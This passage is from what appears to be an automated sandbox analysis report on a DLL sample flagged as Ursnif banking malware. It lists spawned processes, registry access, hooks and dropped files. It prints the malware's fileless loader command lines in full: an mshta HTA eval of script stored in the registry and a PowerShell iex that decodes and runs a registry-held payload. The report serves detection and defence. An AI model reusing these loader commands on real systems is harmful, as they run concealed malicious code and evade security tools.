            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
            Source: u8xtCk7fq8.dllVirustotal: Detection: 33%
            Source: loaddll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: rundll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.586036318.0000023E99060000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.590796199.000002D199FF0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009B5BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009B5BD5
            Source: u8xtCk7fq8.dllStatic PE information: section name: .code
            Source: u8xtCk7fq8.dllStatic PE information: section name: .rdatat
            Source: u8xtCk7fq8.dllStatic PE information: section name: .NewIT
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_029544C0 push ebp; mov dword ptr [esp], FFFF0000h0_2_029544C8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_029544C0 push ebp; mov dword ptr [esp], 00000220h0_2_029544D5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_029511F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx0_2_0295120F
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_029511F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi0_2_02951215
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_029511F3 push esi; mov dword ptr [esp], 00000003h0_2_02951260
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_029511F3 push edx; mov dword ptr [esp], 00F00000h0_2_02951269
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D7177 push ecx; ret 0_2_009D7187
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009D6E10 push ecx; ret 0_2_009D6E19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_044044C0 push ebp; mov dword ptr [esp], FFFF0000h1_2_044044C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_044044C0 push ebp; mov dword ptr [esp], 00000220h1_2_044044D5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_044011F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx1_2_0440120F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_044011F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi1_2_04401215
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_044011F3 push esi; mov dword ptr [esp], 00000003h1_2_04401260
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_044011F3 push edx; mov dword ptr [esp], 00F00000h1_2_04401269
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB7177 push ecx; ret 1_2_00CB7187
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB1246 push cs; retf 1_2_00CB124B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB125E push cs; retf 1_2_00CB125F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB127E push cs; retf 1_2_00CB127F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00CB6E10 push ecx; ret 1_2_00CB6E19
            Source: initial sampleStatic PE information: section name: .code entropy: 7.17681778951
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\